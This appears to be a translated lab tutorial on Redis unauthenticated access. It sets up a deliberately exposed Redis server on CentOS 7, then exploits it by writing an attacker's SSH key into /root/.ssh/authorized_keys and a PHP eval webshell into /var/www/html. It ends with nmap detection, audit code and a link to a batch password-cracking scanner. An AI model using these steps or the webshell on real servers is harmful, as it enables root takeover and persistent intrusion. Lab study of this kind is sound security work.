0x01 Installing the Redis service on CentOS 7
1. Download Redis
[root@localhost ~]# wget http://download.redis.io/releases/redis-5.0.5.tar.gz
--2019-06-19 10:25:18-- http://download.redis.io/releases/redis-5.0.5.tar.gz
正在解析主机 download.redis.io (download.redis.io)... 109.74.203.151
正在连接 download.redis.io (download.redis.io)|109.74.203.151|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:1975750 (1.9M) [application/x-gzip]
正在保存至: “redis-5.0.5.tar.gz”
100%[===================================================>] 1,975,750 23.4KB/s 用时 2m 6s
2019-06-19 10:27:25 (15.3 KB/s) - 已保存 “redis-5.0.5.tar.gz” [1975750/1975750])
2. Extract and compile
[root@localhost ~]# tar -zxf redis-5.0.5.tar.gz
[root@localhost ~]# cd redis-5.0.5/
[root@localhost redis-5.0.5]# make
## Error
[root@localhost redis-5.0.5]# make test
You need tcl 8.5 or newer in order to run the Redis test
## Fix
[root@localhost redis-5.0.5]# yum install tcl -y
## Error
[root@localhost redis-5.0.5]# make test
!!! WARNING The following tests failed:
[err]: pending querybuf: check size of pending_querybuf after set a big value in tests/unit/pendingquerybuf.tcl
the used_memory of replica is much larger than master. Master:43865992 Replica:85809000
[err]: Active defrag in tests/unit/memefficiency.tcl
## Fix: edit the test file that fails
[root@localhost redis-5.0.5]# vim tests/unit/memefficiency.tcl
    # Wait for the active defrag to stop working.
    wait_for_condition 1500 1000 {
        [s active_defrag_running] eq 0
    } else {
        after 120 ;# serverCron only updates the info once in 100ms
        puts [r info memory]
        puts [r memory malloc-stats]
        fail "defrag didn't stop."
    }
## Build and tests succeed
[root@localhost redis-5.0.5]# make test
All tests passed without errors!
0x02 Building the vulnerable environment
1. Start the Redis server on CentOS 7
Stop the firewall first; otherwise a remote host connecting to this server may get "No route to host". Also note that after editing the configuration file, stopping Redis and starting it again with a bare ./redis-server command does not apply the edited configuration: you must start it as ./redis-server followed by the path to redis.conf for the configuration file to take effect.
## First, stop the firewall
[root@localhost ~]# service firewalld stop
Redirecting to /bin/systemctl stop firewalld.service
## Start the Redis server (built-in defaults, redis.conf ignored)
[root@localhost redis-5.0.5]# cd src
[root@localhost src]# ./redis-server
## Start the Redis server with the edited configuration file (redis.conf lives one level up from src/)
[root@localhost redis-5.0.5]# cd src
[root@localhost src]# ./redis-server ../redis.conf
2. Edit the configuration file to create the vulnerable environment
Redis protected-mode is a feature added in version 3.2; the comments in redis.conf explain what it does and when it takes effect. If the Redis version is older than 3.2, no configuration is needed to make the environment vulnerable and you can go straight to section 0x03, because those versions bound 0.0.0.0:6379 by default and remote hosts could access them directly.
When protected-mode is set to yes and the bind address is set to 127.0.0.1, a remote host can connect to the Redis service, but running a Redis command produces the error below.
[root@localhost redis-5.0.5]# vim redis.conf
bind 127.0.0.1
protected-mode yes
# With the configuration above, a remote host can connect to the Redis server but gets the following error.
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
192.168.231.134:6379> info
DENIED Redis is running in protected mode because protected mode is enabled,
no bind address was specified, no authentication password is requested to clients.
When protected-mode is set to no and the bind address is set to 127.0.0.1, connections from remote hosts are refused and only the local machine can connect.
[root@localhost redis-5.0.5]# vim redis.conf
bind 127.0.0.1
protected-mode no
# With the configuration above, connection attempts from a remote host are refused.
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
Could not connect to Redis at 192.168.231.134:6379: Connection refused
not connected>
When protected-mode is set to no and the bind address is set to 0.0.0.0, or the bind 127.0.0.1 line is commented out, a remote host can use the Redis server much as a local client would. This is the vulnerable environment.
[root@localhost redis-5.0.5]# vim redis.conf
#bind 127.0.0.1 # either comment out bind 127.0.0.1
bind 0.0.0.0 # or change bind 127.0.0.1 to bind 0.0.0.0
protected-mode no
# With the configuration above, a remote host can access the Redis server normally.
root@kali:~/redis-5.0.5# ./src/redis-cli -h 192.168.231.134
192.168.231.134:6379> info
# Server
redis_version:5.0.5
........
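As an added check, not part of the original post and not a Redis project tool: the code below speaks just enough RESP to ask a server for its bind, protected-mode and requirepass settings (CONFIG GET only, nothing is changed) and reports what a remote client will get. The classification follows the wording of the DENIED reply shown above, so protected mode is only counted when no bind address is configured, and an explicit non-loopback bind without a password is reported as exposed even with protected-mode yes. The sample reply is constructed, not captured.

```python
import socket

def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array, the format redis-cli uses on the wire."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        raw = a.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out

def parse_config_reply(data: bytes) -> dict:
    """Parse the flat key/value array CONFIG GET returns; error replies raise."""
    if not data:
        raise RuntimeError("connection closed without a reply")
    if data.startswith(b"-"):
        raise RuntimeError(data[1:].split(b"\r\n", 1)[0].decode(errors="replace"))
    lines = data.split(b"\r\n")
    count = int(lines[0][1:])                                   # "*N" header
    values = [lines[2 + 2 * i].decode() for i in range(count)]  # skip "$len" lines
    return dict(zip(values[0::2], values[1::2]))

def classify(cfg: dict) -> str:
    """What a remote client gets, derived from bind / protected-mode / requirepass."""
    bind = cfg.get("bind", "").split()
    if bind and all(a in ("127.0.0.1", "::1") for a in bind):
        return "remote connections refused (loopback bind)"
    if cfg.get("requirepass"):
        return "remote access requires AUTH"
    # Per the DENIED text: protected mode only applies when no bind address is set.
    if not bind and cfg.get("protected-mode") == "yes":
        return "remote commands DENIED by protected mode"
    return "UNAUTHENTICATED remote access"

def audit(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Live check of one server you administer; only CONFIG GET is sent."""
    cfg = {}
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            for param in ("bind", "protected-mode", "requirepass"):
                s.sendall(resp_command("CONFIG", "GET", param))
                cfg.update(parse_config_reply(s.recv(4096)))
    except ConnectionRefusedError:
        return "remote connections refused (loopback bind or firewall)"
    except RuntimeError as err:   # -DENIED from protected mode, or CONFIG disabled
        return "remote commands DENIED by protected mode" if "DENIED" in str(err) else str(err)
    return classify(cfg)

# Constructed reply (not captured from a server): CONFIG GET bind on the config above.
SAMPLE_BIND_REPLY = b"*2\r\n$4\r\nbind\r\n$7\r\n0.0.0.0\r\n"
```

Running audit() against each of the three configurations in this section reproduces the three outcomes the post shows: refused, DENIED, and an unauthenticated answer.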
0x03 Exploitation
1. Log in to the Redis server with an SSH public key
The idea is to insert a key into the database whose value is the remote host's public key, then change the database directory (dir) to /root/.ssh and the dump filename (dbfilename) to authorized_keys, so that saving the dataset writes the buffered data into that file and an authorized key appears under /root/.ssh on the server.
## Check for the .ssh directory
root@kali:~# cd .ssh/
root@kali:~/.ssh#
root@kali:~/.ssh# ls
known_hosts
## If there is no public key yet, generate one
root@kali:~/.ssh# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:iG8O+z5kBqfDu5yiuuVcwQCleuT26pc7BfBSSjlBt9k root@kali
## Save the generated public key to 1.txt, padded with blank lines
root@kali:~/.ssh# ls
id_rsa id_rsa.pub known_hosts
root@kali:~/.ssh# (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt
root@kali:~/.ssh# ls
1.txt id_rsa id_rsa.pub known_hosts
## Write 1.txt into Redis as the value of a key
root@kali:~/.ssh# cp 1.txt /root/redis-5.0.5/src/
root@kali:~/.ssh# cd /root/redis-5.0.5/src/
root@kali:~/redis-5.0.5/src# cat 1.txt | ./redis-cli -h 192.168.231.134 -x set hack
OK
## Set the Redis dump directory to /root/.ssh and the dump filename to authorized_keys
root@kali:~/redis-5.0.5/src# ./redis-cli -h 192.168.231.134
192.168.231.134:6379> CONFIG SET dir /root/.ssh
OK
192.168.231.134:6379> CONFIG SET dbfilename authorized_keys
OK
192.168.231.134:6379> keys *
1) "hack"
192.168.231.134:6379> save
OK
## SSH from the remote host into the Redis server
root@kali:~/.ssh# ssh -i id_rsa root@192.168.231.134
Last login: Wed Jun 19 11:45:53 2019
[root@localhost ~]# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.231.134 netmask 255.255.255.0 broadcast 192.168.231.255
inet6 fe80::f856:ac64:ecf1:a14 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:b7:ba:75 txqueuelen 1000 (Ethernet)
RX packets 3113 bytes 216089 (211.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1494 bytes 178566 (174.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
2. Writing a webshell
A webshell controls a website's server through the web: uploading and downloading files, browsing the database, running arbitrary commands, and so on. Its biggest advantage is that it passes through the firewall, because all traffic exchanged with the controlled server or remote host goes over port 80 and is not blocked. Using a webshell generally leaves no record in the system logs, only some request entries in the site's web logs, so an inexperienced administrator will find the intrusion hard to spot.
## Write the webshell
root@kali:~/redis-5.0.5/src# ./redis-cli -h 192.168.231.134
192.168.231.134:6379> config set dir /var/www/html
OK
192.168.231.134:6379> set webshell "\n\n<?php @eval($_POST['pass']);?>\n\n"
OK
192.168.231.134:6379> CONFIG SET dbfilename test.php
OK
192.168.231.134:6379> save
OK
## Connect over SSH and inspect the written file
[root@localhost ~]# ifconfig ens33
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.231.134 netmask 255.255.255.0 broadcast 192.168.231.255
inet6 fe80::f856:ac64:ecf1:a14 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:b7:ba:75 txqueuelen 1000 (Ethernet)
RX packets 3836 bytes 269636 (263.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2050 bytes 233207 (227.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[root@localhost ~]# cat /var/www/html/test.php
REDIS0009� redis-ver5.0.5�
�edis-bits�@�ctime�S� ]used-mem�`
aof-preamble��webshell"
<?php @eval($_POST['pass']);?>
.................
0x04 Detecting the vulnerability
1. A single host can be checked with nmap
A server with the unauthenticated-access vulnerability is detected as follows.
root@kali:~/.ssh# nmap -sS -sV -p 6379 -Pn -n --script="redis-info" 192.168.231.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 13:30 CST
Nmap scan report for 192.168.231.134
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.5 (64 bits)
| redis-info:
| Version: 5.0.5
| Operating System: Linux 3.10.0-957.el7.x86_64 x86_64
| Architecture: 64 bits
| Process ID: 12197
| Used CPU (sys): 2.656197
| Used CPU (user): 0.941046
| Connected clients: 2
| Connected slaves: 0
| Used memory: 855.51K
| Role: master
| Bind addresses:
| 0.0.0.0
| Client connections:
|_ 192.168.231.130
MAC Address: 00:0C:29:B7:BA:75 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds
A Redis server running in protected mode that still accepts remote connections is detected as follows.
C:\Users\14017>nmap -sS -sV -Pn -p 6379 -n --script="redis-info" 192.168.231.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 13:32 中国标准时间
Nmap scan report for 192.168.231.130
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis?
| fingerprint-strings:
| NULL:
|_ -DENIED Redis is running in protected mode because protected mode is enabled,
no bind address was specified, no authentication password is requested to clients.
MAC Address: 00:0C:29:B4:11:00 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
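To triage many nmap runs like the two above, here is an added parser (mine, not the post's and not part of nmap) that splits nmap's normal output per host and labels each Redis port from a defender's point of view. The sample output is constructed from the two scans shown, with spacing abbreviated, plus a made-up third host whose port is closed.

```python
import re

# Constructed sample modelled on the two scans above, plus a made-up closed host.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.231.134
Host is up (0.00031s latency).
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.5 (64 bits)
| redis-info:
|   Version: 5.0.5
|   Bind addresses:
|     0.0.0.0
|   Client connections:
|_    192.168.231.130
Nmap scan report for 192.168.231.130
Host is up (0.00013s latency).
PORT     STATE SERVICE VERSION
6379/tcp open  redis?
| fingerprint-strings:
|   NULL:
|_    -DENIED Redis is running in protected mode because protected mode is enabled,
Nmap scan report for 192.168.231.1
Host is up (0.00010s latency).
PORT     STATE  SERVICE VERSION
6379/tcp closed redis
"""

def split_reports(text: str) -> dict:
    """Return {host: report text} for each 'Nmap scan report for' block."""
    parts = re.split(r"^Nmap scan report for (\S+)\n", text, flags=re.M)
    return {parts[i]: parts[i + 1] for i in range(1, len(parts), 2)}

def triage(report: str) -> str:
    """Label one host's report: closed, protected, unauthenticated, or unclear."""
    if not re.search(r"^6379/tcp\s+open", report, re.M):
        return "not exposed"
    if "DENIED Redis is running in protected mode" in report:
        return "protected mode: connection accepted, remote commands denied"
    if "redis-info:" in report:
        # redis-info only produces this block when INFO answered without AUTH.
        m = re.search(r"Bind addresses:\n((?:\|_?\s+\S+\n)+)", report)
        binds = re.findall(r"\|_?\s+(\S+)", m.group(1)) if m else ["(unknown)"]
        return "UNAUTHENTICATED: INFO answered without AUTH, bind " + " ".join(binds)
    return "open, unconfirmed: inspect manually"

def triage_all(text: str) -> dict:
    return {host: triage(report) for host, report in split_reports(text).items()}
```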
2. Batch checks can be done with the SNETCracker weak-password scanner
## Download
Latest SNETCracker release download:
https://github.com/shack2/SNETCracker/releases/download/1.0.20190522/V1.0.Beta26.20190522.zip
Batch detection tool